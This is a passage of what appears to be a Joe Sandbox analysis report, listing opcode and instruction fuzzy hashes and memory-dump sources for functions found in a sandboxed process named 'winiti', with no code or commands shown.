                                                              • Instruction ID: 230e7ec3859a659029c8a5ade0bff38753367a915db9568b0da60ba5c00bbbb4
                                                              • Opcode Fuzzy Hash: 1298abcab80a18e1c913db093b3c9d2d23af9f9142fcde2ada4d46b7528aab32
                                                              • Instruction Fuzzy Hash: CE51DC347002204BEF26666CE494B3F365AD7A9714F749936E50AC7788CE7DCD4187E2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78a1d643243f813f5cc097817dc3db81c80802e25ca26d7ad0202393e722fd22
                                                              • Instruction ID: c90467539bfd48ec85c31dddca045c2683a312f5d02a0bb31fd062f313167008
                                                              • Opcode Fuzzy Hash: 78a1d643243f813f5cc097817dc3db81c80802e25ca26d7ad0202393e722fd22
                                                              • Instruction Fuzzy Hash: BF517B30A10215CFDB25DBA4E944BAEB7F2BF94300F24C569E4169B385DB75DD86CB80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc2cf1ce7990a25e7b181af72c2abcf756ff3d6045c9a5b67fe897171b303390
                                                              • Instruction ID: 37b59015cb1dda274189c4f6383a08e5aef6a992a97c6d4302bade2a80fe4d16
                                                              • Opcode Fuzzy Hash: bc2cf1ce7990a25e7b181af72c2abcf756ff3d6045c9a5b67fe897171b303390
                                                              • Instruction Fuzzy Hash: 47516E30A00215CFDB25DBA4E944BAEB7F2BF94300F248569E5169B345DB75DD86CB80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 13fbd7612f61587cd10aec50b92e158207caa09f9784ad9fcef08c65452042fd
                                                              • Instruction ID: 1cbddf594e31cffd5e464a591d3fa2b2000ce7757d64cd055b9c8a5efe344770
                                                              • Opcode Fuzzy Hash: 13fbd7612f61587cd10aec50b92e158207caa09f9784ad9fcef08c65452042fd
                                                              • Instruction Fuzzy Hash: A431B270A1071A8FDB11EFA4E4406AEB7F2FF85300F548929D9059B254DB75ED46CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b643dd115073c31049b6c29abbb51daa164e8dfb4e297bdff4831e3391abc487
                                                              • Instruction ID: a14d454b2b75e2380f569171b56b9c9efa4d47e3a6475cf1c811e72f8fe745e8
                                                              • Opcode Fuzzy Hash: b643dd115073c31049b6c29abbb51daa164e8dfb4e297bdff4831e3391abc487
                                                              • Instruction Fuzzy Hash: C3319030E1020A9BDF19EF65D4946AEB7F2FF89310F11852AE816EB750DB71AC46CB50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44f3ce37959525d206bf6c3a202582c81d0e4ed6ae4d56edcd5bb41de761cec9
                                                              • Instruction ID: bbab88f5bb61c79cc056ff2dacd632ca60b9a7e77366b3f88e972a10f01b1497
                                                              • Opcode Fuzzy Hash: 44f3ce37959525d206bf6c3a202582c81d0e4ed6ae4d56edcd5bb41de761cec9
                                                              • Instruction Fuzzy Hash: 3031B270A1071A8FDF11EFA4E44069EB7F2FF85300F548929E505AB204DB75ED46CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18c46ca9d2c69bc85804d2573dbd6c2c84b1c2c9d7c2a18e430deadf244f4c98
                                                              • Instruction ID: b42dd5c11d289136776f33222ebf33ef00caa00cfa1c58006870eaf9d8561373
                                                              • Opcode Fuzzy Hash: 18c46ca9d2c69bc85804d2573dbd6c2c84b1c2c9d7c2a18e430deadf244f4c98
                                                              • Instruction Fuzzy Hash: 23315E30A1020A9BDF19EF65D4946AEB7B2FF89310F118529E816EB754DB70AC46CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 196867d64cf81c24a0e39b9959023208b8384eb9103434e70d999b2db4638ad6
                                                              • Instruction ID: cb712c5c01526fa590cd074d3abd8ffb2e604152df66660590ef83dd643ea6fb
                                                              • Opcode Fuzzy Hash: 196867d64cf81c24a0e39b9959023208b8384eb9103434e70d999b2db4638ad6
                                                              • Instruction Fuzzy Hash: 9D41E2B0D00349DFDB14CF99D884ADEBFB5AF48314F60842AE809AB354DB74A959CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f819903e42d9ec6ce6f99417ba4e547d7e8ffd19550cda2b74468e0d8b623f2
                                                              • Instruction ID: 07f4f2d34ce5612fc9b3ee14ce7e6269fc1bdb942a0e7da10b9e92a5e0a220ca
                                                              • Opcode Fuzzy Hash: 9f819903e42d9ec6ce6f99417ba4e547d7e8ffd19550cda2b74468e0d8b623f2
                                                              • Instruction Fuzzy Hash: C5219C75F112059FDB54DF69E980BEEB7F1AB48710F108026E806E7355EB34DD418B90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c494e21cb8894a509d73def8fc685d22e8ab24e4f4fc1fe15729db715fd9c87
                                                              • Instruction ID: caa19dfd650252b5015da0c4edbb65f055014dce87cc3097e77ad62a5f411f91
                                                              • Opcode Fuzzy Hash: 3c494e21cb8894a509d73def8fc685d22e8ab24e4f4fc1fe15729db715fd9c87
                                                              • Instruction Fuzzy Hash: 8521BA71F1120A8FDB50DF69E980BAEB7F1EB48310F108026E906E7355E730DD508B94
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3666b759fa16b13385866a04f789191d00ae1d2daedeea5961549cd2d7ffd49
                                                              • Instruction ID: 91f1465a7fb607d25f4e70bfb56d6b90baec5dd73aa01eccfc390644ca89ddf8
                                                              • Opcode Fuzzy Hash: b3666b759fa16b13385866a04f789191d00ae1d2daedeea5961549cd2d7ffd49
                                                              • Instruction Fuzzy Hash: 5A215E31E1420A9BDB15DFA4D4846AEF7B2FF89310F10C62AE805EB344EB759C96CB50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.713974306.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_19d000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 366c8b69edde03fe8b14f692671afc6e46caaf6c901c18c5641783fca34c9d3d
                                                              • Instruction ID: 318d1f220364db88f52179cd1329722b4412f1deb5bea5d64bbe73adff4f22e1
                                                              • Opcode Fuzzy Hash: 366c8b69edde03fe8b14f692671afc6e46caaf6c901c18c5641783fca34c9d3d
                                                              • Instruction Fuzzy Hash: A121C2B5604340EFDF15DF14E9C4B26BBA5EB84314F38C5AAE8494B256C33AD847CB62
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 964d61ddfeb4b72cb9b75aadee2df2626b78093dfb830087192894355da3a1ab
                                                              • Instruction ID: 2b8bacc792d3b786459703756bdf20185f8366d50b68de96702bc385ff39d195
                                                              • Opcode Fuzzy Hash: 964d61ddfeb4b72cb9b75aadee2df2626b78093dfb830087192894355da3a1ab
                                                              • Instruction Fuzzy Hash: BC214634A10205DFDB14EB38D9A87AD7BF1BF4C305B2044A9D906EB3A0DB319D11CB61
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba34ecf4ee323d32014f91ec897cc63be0be7a2a8461733a353095925ef49be6
                                                              • Instruction ID: 74f033474953d72826a8052b9e48e81c47cca8bc013b8e143cf5a785490feb52
                                                              • Opcode Fuzzy Hash: ba34ecf4ee323d32014f91ec897cc63be0be7a2a8461733a353095925ef49be6
                                                              • Instruction Fuzzy Hash: E7218431E142169BDB18CFA4D4406AEF7B6BF89310F20866BE815FB390EB75AC41CB50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87eb34e8aca7bd02905efce1000cfe2e0f3a2b47972f0eed048200f457b0106a
                                                              • Instruction ID: 222fbd6999e594a4b554b2886d08cb4fa8c55bf69716f9c4fccb7c8b464c7cbd
                                                              • Opcode Fuzzy Hash: 87eb34e8aca7bd02905efce1000cfe2e0f3a2b47972f0eed048200f457b0106a
                                                              • Instruction Fuzzy Hash: A2215C34B10205EFEB14EF68D5147AEB7F6AF89345F20046AD406EB7A0DB358C61CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0dec151c1f96bd078b377ea94fdcdeb2748bdf4be86e9fbaab496adf499e1a15
                                                              • Instruction ID: e40f97c64dffc84d2ed43fd2aea35f928ada5b40307c70e82944db9be0890081
                                                              • Opcode Fuzzy Hash: 0dec151c1f96bd078b377ea94fdcdeb2748bdf4be86e9fbaab496adf499e1a15
                                                              • Instruction Fuzzy Hash: 2E219D30B002289BDF18EA69F9546AEB7F7FB94310FA08429E505EB345DB35ED458B80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3984261abf6970e172fc0368e73a6c0f5a2be9589f0061a6f43b81045698d6cd
                                                              • Instruction ID: a3b3d62873d12366811b7b73c3f8369a2696320e3cc6acedb19de09663f7c5e1
                                                              • Opcode Fuzzy Hash: 3984261abf6970e172fc0368e73a6c0f5a2be9589f0061a6f43b81045698d6cd
                                                              • Instruction Fuzzy Hash: 8021E774620206AFDB22EF28F88876D3769EF88315F908D26D106C775CD638DDA58BD1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af4aa6135820b6ff809b355f894245c3bd38592a8f8b6a435b8d73e6f8cefe38
                                                              • Instruction ID: ab9608209541f7cb979ce406d0507e9b5fa122b3c9a5bc0f0500b0ae92d59f8e
                                                              • Opcode Fuzzy Hash: af4aa6135820b6ff809b355f894245c3bd38592a8f8b6a435b8d73e6f8cefe38
                                                              • Instruction Fuzzy Hash: 5A210334A10205DFDB14EB78E958BAE77F2BB8C305B104469E906EB3A0DB319D118B65
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd0cf34d526523fa778f163abadf78d8fbef5bf1bbb25e8ed3b24d42dff9257e
                                                              • Instruction ID: 5387084165da48ce2e7b5b04a64fbe535ef9ddc4ec0dbf46d5f77d6c6f26f88f
                                                              • Opcode Fuzzy Hash: fd0cf34d526523fa778f163abadf78d8fbef5bf1bbb25e8ed3b24d42dff9257e
                                                              • Instruction Fuzzy Hash: 6E215E34B14206EFEB14EF74DA142ADB7F1AF49345F20046AD406EB7A0DB398C61CB61
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cb9f14015d42353b8eb9540befea1f3344a71b57d51d47918e1ddef9fe68ce0
                                                              • Instruction ID: 88a949c32d03e718b59008e29c2b86d33bc0404d9db317a296d747c4d88492bc
                                                              • Opcode Fuzzy Hash: 8cb9f14015d42353b8eb9540befea1f3344a71b57d51d47918e1ddef9fe68ce0
                                                              • Instruction Fuzzy Hash: 5E21C234A11219CBCF10DF94E588AAEBBB2FF58305F688156D801A7255DB34ED82CF50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d94ab58ef83e3a46a57192627138fc8ea3f541750ee51e880932a5443e4557ba
                                                              • Instruction ID: 06139487d66e7b0f3b61f224dd6f3df68e01026daa507e9ad374bc7e7524c4ad
                                                              • Opcode Fuzzy Hash: d94ab58ef83e3a46a57192627138fc8ea3f541750ee51e880932a5443e4557ba
                                                              • Instruction Fuzzy Hash: 6521F7B1D012199FCB50CF99D884BDEFBF4FB48710F14806AE818AB255D3749A44CBA4
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16513c8f0854be080945104bcd1196f562446d4b623f4f8a07d41c0fc1cddcfe
                                                              • Instruction ID: 8ef2e6e559bd8315646133e79bfc2cbaec4b6633fe9b5b94470c234f7bc9c31f
                                                              • Opcode Fuzzy Hash: 16513c8f0854be080945104bcd1196f562446d4b623f4f8a07d41c0fc1cddcfe
                                                              • Instruction Fuzzy Hash: 2411A330B202058FDF259E78D4947AA3391EF95310F20893AE006CF361DE61CD559BD1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f4c9bdfa6c8428a7f03f08f0b45cfdf999bdb6394c303cdd455547822b66d436
                                                              • Instruction ID: 6352d19003996e69049d4b7f1eadb1df366ac0d83464030b2b6200cbcf25bcdd
                                                              • Opcode Fuzzy Hash: f4c9bdfa6c8428a7f03f08f0b45cfdf999bdb6394c303cdd455547822b66d436
                                                              • Instruction Fuzzy Hash: D611A330B243064FEF265A74D4903AE3761EF92310F65497BE006DB3A2EA61CD559BD2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2425041bdf0a0d9f91a5bad125be0e8e53df7cbd2dd52788692c1165cef3a8c1
                                                              • Instruction ID: b490b35c846d8ec29227f91453a52dc2ce942ca9ecd271e5eafb62f0472e3e00
                                                              • Opcode Fuzzy Hash: 2425041bdf0a0d9f91a5bad125be0e8e53df7cbd2dd52788692c1165cef3a8c1
                                                              • Instruction Fuzzy Hash: 3521F0B1D10259AFCB00CF9AD984ADEFFB4FF48314F20816AE918A7311C374A954CBA5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34b1f080593759e857149e94ad9494550464b2bd8c9a89d4c3e81cfbcca3b2ea
                                                              • Instruction ID: be935f3fa4b2a90b31807c654576bddf26e29fa65eeb386242d9ca5222425d59
                                                              • Opcode Fuzzy Hash: 34b1f080593759e857149e94ad9494550464b2bd8c9a89d4c3e81cfbcca3b2ea
                                                              • Instruction Fuzzy Hash: A911A536B101198FCFA89B68D9146AE73EBABC9710F108536D40BE7354DE75DC018794
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7f9d1c6bdd847d688fae8438791842378684f1e901c6151942d30e567a72c2b
                                                              • Instruction ID: 2a015c775e5b97be8e440e0bf2820b700dfbadf7455a3937b84e2441f01378f7
                                                              • Opcode Fuzzy Hash: d7f9d1c6bdd847d688fae8438791842378684f1e901c6151942d30e567a72c2b
                                                              • Instruction Fuzzy Hash: 6D21B2B5D112199FCB00CF99D984ADEFFB4FB49350F20852AE918A7700C374A954CFA5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce5bde3fa918d0726b44cb2eda3993574a76096a6b80f00377aa89362e31bb61
                                                              • Instruction ID: 7efe7d852478a9d6aab4fdad9cf81710aca74b2c5124724a121fb611cb015d5c
                                                              • Opcode Fuzzy Hash: ce5bde3fa918d0726b44cb2eda3993574a76096a6b80f00377aa89362e31bb61
                                                              • Instruction Fuzzy Hash: 2D21C2B1D10259AFCB00CF9AD984ADEFFB4FB49310F60852AE918B7340D374A954CBA5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f47bc96b88e3c611aa64178ea63336f01cfdce493697b829afd8e1a4411d0bc9
                                                              • Instruction ID: e00e7b4f4e3e1ac693b21019c75da26383dfad43291af15890817b8e3da55320
                                                              • Opcode Fuzzy Hash: f47bc96b88e3c611aa64178ea63336f01cfdce493697b829afd8e1a4411d0bc9
                                                              • Instruction Fuzzy Hash: 5B11A175B10211AFCF10AB78A80866E7BE9EB8C250F14482AE906D3754EA35C9618B81
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a2d7ff59308097477a09d343b36511b334d3b918e1ba0b45120e160604e0547c
                                                              • Instruction ID: 4f05d8906b0b22439e77194714aabd157b21e241214822ef88d5d7b3a2ba6cf8
                                                              • Opcode Fuzzy Hash: a2d7ff59308097477a09d343b36511b334d3b918e1ba0b45120e160604e0547c
                                                              • Instruction Fuzzy Hash: E701BC31B001604FEB25A66CA424B2E67DBDBE9710F10883AF00BCB385DE69DC4283A1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3a3c7b180554af3280e68911e2188073f0b1fd252ff21dc7cb6e3e6188dba33
                                                              • Instruction ID: b10a87ef74696dd8a05144db4a2a40bd7c663812761b63444af6c155b076a21b
                                                              • Opcode Fuzzy Hash: d3a3c7b180554af3280e68911e2188073f0b1fd252ff21dc7cb6e3e6188dba33
                                                              • Instruction Fuzzy Hash: 1401B132B201158FDFA89B689D246FE77AA9BC9700F00413AD407D7384DE218D068791
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 251e7d09d14b10155a38e5e4c0da67a5483fd450627714c12b214fbb5a613bf3
                                                              • Instruction ID: 721f3521b3dfba82ed993b9559944631adfc902bd4481b467ff09dec5ea058b1
                                                              • Opcode Fuzzy Hash: 251e7d09d14b10155a38e5e4c0da67a5483fd450627714c12b214fbb5a613bf3
                                                              • Instruction Fuzzy Hash: 56018031F102169BCF21EFB884452AE7BF5EF88350B24447BD405E7701EA35CC618BA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.713974306.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_19d000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                              • Instruction ID: c304366a257fc2d2bc8c153422ded2ceb55475e8d098896b5147d67f95c8fa82
                                                              • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                              • Instruction Fuzzy Hash: 6A119D75504280DFDB12CF14E9C4B15FFA1FB84314F28C6AEE8494B656C33AD84ACBA2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1ce23ff75dc04f2416937e06894d6e2fe1d2ff824d475e5fb2ffd601a8be73c
                                                              • Instruction ID: 5119343ea9975a17a66914ca448a722b5ec78c90eed53a2d15b78af138d4c79f
                                                              • Opcode Fuzzy Hash: f1ce23ff75dc04f2416937e06894d6e2fe1d2ff824d475e5fb2ffd601a8be73c
                                                              • Instruction Fuzzy Hash: AF01F7317042155FDB25967CA89477E77D6EBD6710F14883EF54EC7340EA19DD024392
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5cc13bd0927d2599bb1972320a0679229569c93f4f49723f2bebff6ae2b7351b
                                                              • Instruction ID: 469e9c07f3c4c0ec3f11cd3a2d3fa2b2ac2c55800be476111caf0eff7da43c25
                                                              • Opcode Fuzzy Hash: 5cc13bd0927d2599bb1972320a0679229569c93f4f49723f2bebff6ae2b7351b
                                                              • Instruction Fuzzy Hash: 020181317001244BDB64A6ADA454B2FB2DAEBD9760F10883AF50ECB385DE69DC4243E5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3dd6c42c9d52cfe63ad2905c6bd2fcce7154f4d9c3f2a03e1641fc1f167cc0d
                                                              • Instruction ID: 450ccb305f174c16383588b17d3e9ca8aa759503d70ab6fe2ca87138608d4eda
                                                              • Opcode Fuzzy Hash: d3dd6c42c9d52cfe63ad2905c6bd2fcce7154f4d9c3f2a03e1641fc1f167cc0d
                                                              • Instruction Fuzzy Hash: EC01DF307042604FDB21A638F85872A37E6EF96700F20846EE01ACB385DB2ACC028784
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5208bc58cde52f1a798494a53664ffa15350286245cd87ad78cdbd7b38ba63ca
                                                              • Instruction ID: e88e94f21e07338be2f62376296df0d8a611d7d5a106039e235fd59cd5f8c0c5
                                                              • Opcode Fuzzy Hash: 5208bc58cde52f1a798494a53664ffa15350286245cd87ad78cdbd7b38ba63ca
                                                              • Instruction Fuzzy Hash: 49010431A102448FCB14DF68D88179EBB72EFC0310F64C566C8481B38ADB74DD06CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 936fbd3308605e5f0c8b8666958410499d763bb8300bece1bd9ff51529661795
